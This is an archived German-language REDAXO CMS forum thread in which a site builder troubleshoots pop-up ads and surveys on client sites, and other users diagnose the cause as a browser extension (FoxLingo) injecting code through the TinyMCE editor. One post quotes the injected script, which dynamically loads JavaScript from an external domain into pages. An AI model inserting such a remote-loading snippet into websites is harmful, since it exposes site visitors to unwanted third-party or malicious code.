[phpBB Debug] PHP Warning: in file [ROOT]/ext/tas2580/seourls/event/listener.php on line 213: Undefined array key "FORUM_NAME"
Seite gehackt?! - REDAXO Forum
Hallo,

Wir haben in letzter Zeit festgestellt, dass die Kommunikation via Slack viel schneller und zielführender ist als ein Beitrag im Forum. Aufgrund der neuen und besseren Möglichkeiten der Kommunikation haben wir uns entschlossen das Forum nur noch als Archiv zur Verfügung zu stellen. Somit bleibt es weiterhin möglich hier nach Lösungen zu suchen. Neue Beiträge können nicht mehr erstellt werden.

Wir empfehlen, für deine Fragen/Probleme Slack zu nutzen. Dort sind viele kompetente Benutzer aktiv und beantworten jegliche Fragen, gerne auch von REDAXO-Anfängern! Slack wird von uns sehr intensiv und meistens "rund um die Uhr" benutzt :-)
Selbst einladen kannst Du dich hier: https://redaxo.org/slack/
skywise01
Beiträge: 5
Registriert: 23. Sep 2014, 12:19

Seite gehackt?!

24. Sep 2014, 11:08

Hallo und HILFE !!!

Folgendes Problem tritt seit einigen Tage bei unterschiedlichen Kunden auf:
Nach einigen Klicks (unterschiedlicher Anzahl) erscheint plötzlich in einem neuen Fenster mal eine Umfrage, mal ein Gewinnspiel. Heißt also - irgendwo ist ein Hack auf der Seit o.ä.

Zwei Systeme waren 4.4.1 - hier habe ich das TinyModul schon getauscht. Eine andere Seite habe ich komplett auf 4.6.1. und Tiny 2.5 geswitcht und die Sicherung wieder eingespielt. Trotzdem ist das hier immer noch?! :twisted:

Hat jemand eine Idee was ich tun kann bzw. wo sich das "versteckt" um das zu eliminieren?!

Danke, Tim Pohlmann

Benutzeravatar
RexDude
Beiträge: 2543
Registriert: 22. Apr 2010, 11:24

Re: Seite gehackt?!

24. Sep 2014, 11:20

Klingt schon nach nem Hack. Du musst halt mal die Seite analysieren z.B. mit Firebug und schauen woher die Fenster geöffnet werden. Vermutlich wurden die Javascript-Dateien manipuliert also kannst du da auch mal einen Blick reinwerfen.
Zuletzt geändert von RexDude am 24. Sep 2014, 15:53, insgesamt 1-mal geändert.

Benutzeravatar
Ruediger.Nitzsche
Beiträge: 2117
Registriert: 13. Dez 2005, 09:29
Wohnort: Coburg
Kontaktdaten: Website

Re: Seite gehackt?!

24. Sep 2014, 15:51

Filezilla + Windows + Trojaner evtl. im Spiel?

Rüdiger
gn2 netwerk | gn2 hosting | REDAXO Referenzen | Github
Supportanfragen per PN werden gepflegt ignoriert

Benutzeravatar
Jan.Kristinus
Admin
Beiträge: 2166
Registriert: 24. Aug 2004, 22:11
Wohnort: Frankfurt
Kontaktdaten: ICQ Website

Re: Seite gehackt?!

25. Sep 2014, 10:55

Es gibt keine bekannte Sicherheitslücke in REDAXO. Aber es ist äußert schwierig, dass Script / Problem zu finden und zu entfernen. Hatte das bei einigen Kunden auch schon erlebt und diese Scripte haben sich an unterschiedlichsten Stellen reingeflanscht.

D.h, sehr penibel ALLES durchschauen. Dateisystem, Templates und Module. Alles was seltsam ist erstmal ausschalten oder entfernen. Pauschal lässt sich aber schwer helfen.

lg

Jan
Yakamara Media GmbH & Co. KG | Kaiserstrasse 69 | 60329 Frankfurt
Tel.: 069-900.20.60.30
http://www.yakamara.de/

Benutzeravatar
Ruediger.Nitzsche
Beiträge: 2117
Registriert: 13. Dez 2005, 09:29
Wohnort: Coburg
Kontaktdaten: Website

Re: Seite gehackt?!

25. Sep 2014, 11:48

Bei allen uns bekannten Fällen waren es entweder ausgelesene FTP-Zugangsdaten oder Drittskripte, die mit im Account lagen und vergessen worden sind (phpMyAdmin für Agenturen, alte Wordpress & Co. sind da beliebte Kandidaten).

Rüdiger
gn2 netwerk | gn2 hosting | REDAXO Referenzen | Github
Supportanfragen per PN werden gepflegt ignoriert

skywise01
Beiträge: 5
Registriert: 23. Sep 2014, 12:19

Re: Seite gehackt?!

25. Sep 2014, 13:25

.... ok, ich werde mal auf die Suche gehen, wobei das allerdings auch bei zwei Seiten aufgetreten ist, an denen wir die letzten Monate selber nicht dran waren, also das nicht von einem einzelnen Arbeitsplatz dort reingekommen ist. Zudem auch bei unterschiedlichen Anbietern mit versch. Zugangsdaten.

Danke schon mal bis hierher.

skywise01
Beiträge: 5
Registriert: 23. Sep 2014, 12:19

Re: Seite gehackt?!

26. Sep 2014, 08:41

Hallo,

ich habe nun etwas geforscht und in manchen Seiten ein Script gefunden (nur in den Artikeln im html zu sehen NICHT in der Datenbank):

<script id="FoxLingoJs" type="text/javascript">// <![CDATA[
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxl ... ction(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
// ]]></script>

Kann es daran liegen?!
Allerdings ist KEIN ADON im Browser (wedre bei mir noch beim Kunden) installiert und auf allen Rechnern, die mit den Seiten arbeiten hat ein Virenscan nichts gefunden. Was kann ich nun machen und woher kommt das? Ich stehe noch etwas auf dem Schlauch.... :(

Meine Kunden sind arg abgenervt da auch zeitweise sexistische Einblendungen kommen.
Über Hilfe würde ich mich freuen.

Danke und Gruß

Benutzeravatar
RexDude
Beiträge: 2543
Registriert: 22. Apr 2010, 11:24

Re: Seite gehackt?!

26. Sep 2014, 08:45

Na entferns doch einfach, dann siehst du doch ob es daran liegt ;)

Benutzeravatar
Ruediger.Nitzsche
Beiträge: 2117
Registriert: 13. Dez 2005, 09:29
Wohnort: Coburg
Kontaktdaten: Website

Re: Seite gehackt?!

26. Sep 2014, 09:17

Liegt definitiv nur REDAXO in den Accounts? Sind die FTP-Passwörter alle zurückgesetzt, was sagen die Logfiles des Hosters? Sind irgendwelche externen Datenquellen in die Seiten eingebunden?

Rüdiger
gn2 netwerk | gn2 hosting | REDAXO Referenzen | Github
Supportanfragen per PN werden gepflegt ignoriert

Benutzeravatar
runstop64
Beiträge: 369
Registriert: 23. Okt 2012, 21:34
Wohnort: Hamburg
Kontaktdaten: Website Facebook Twitter

Re: Seite gehackt?!

26. Sep 2014, 10:17

Moin,

wie hast du das Problem denn bisher eingegrenzt? Schon ein Backup eingespielt? Auf einer unserer Websites hatte sich mal ein Hack über den FTP-Zugang des Kunden eingeschlichen und einfach ein paar Zeilen an eine der Startdateien angehängt, das ließ sich recht leicht am Datum der Dateien nachvollziehen. Hast du ansonsten definitiv ausgeschlossen, dass es eine FF Erweiterung ist? Laut Google scheint es da öfter Probleme zu geben.
Ist das Skript auch in der Quelltextansicht (Ctrl+U) oder nur über Firebug zu finden?
Viele Grüße,
Daniel


studio-ahoi.de | Referenzen | Friends Of REDAXO

skywise01
Beiträge: 5
Registriert: 23. Sep 2014, 12:19

Re: Seite gehackt?!

26. Sep 2014, 10:20

...es ist nur Radxo auf den Servern (Plesk Oberfläche) - es betrifft derezti auch nur zwei Seiten mit dem 4.4.1 er System und altem TinyMCE (habe ich schon geupdated). Ich werde das eine System nue aufspielen, da die Datenbank "sauber" zu sein scheint und dann mal sehen ob alles weg ist....

Das Script ist nun überall raus - und immer noch ist der Hack drin ......

Danke und Gruß, Tim
Zuletzt geändert von skywise01 am 26. Sep 2014, 14:51, insgesamt 1-mal geändert.

skywise01
Beiträge: 5
Registriert: 23. Sep 2014, 12:19

Re: Seite gehackt?!

26. Sep 2014, 14:45

Also, alles zurück - das o.g. Script wurde in die datenbank geschrieben !?!
ich habe es dann in 14 Artikel Slice gefunden. :cry:

Benutzeravatar
runstop64
Beiträge: 369
Registriert: 23. Okt 2012, 21:34
Wohnort: Hamburg
Kontaktdaten: Website Facebook Twitter

Re: Seite gehackt?!

26. Sep 2014, 15:26

Ich würde das so erklären: Einer der Redakteure hat die FF-Erweiterung FoxLingo installiert, die ein Script zur Übersetzung (und Werbung) in Websites integriert, das hängt sich auch an die Editortexte dran und wird beim Speichern ungewollt ins Modul aufgenommen, wo es dann auch für alle, die die Erweiterung nicht haben das entsprechende Skript lädt. Scheint ein gängiges Problem bei allen CMS mit TinyMCE Texteditor zu sein (https://www.google.de/search?q=FoxLingo ... 8QfcuIDACQ)
Ich hatte letztens ein ähnliches Problem mit der Pinterest Erweiterung vom FF.

Vielleicht fragst Du mal nach, ob FoxLingo von einem der Redakteure genutzt wird.
Viele Grüße,
Daniel


studio-ahoi.de | Referenzen | Friends Of REDAXO

Zurück zu „Allgemeines [R4]“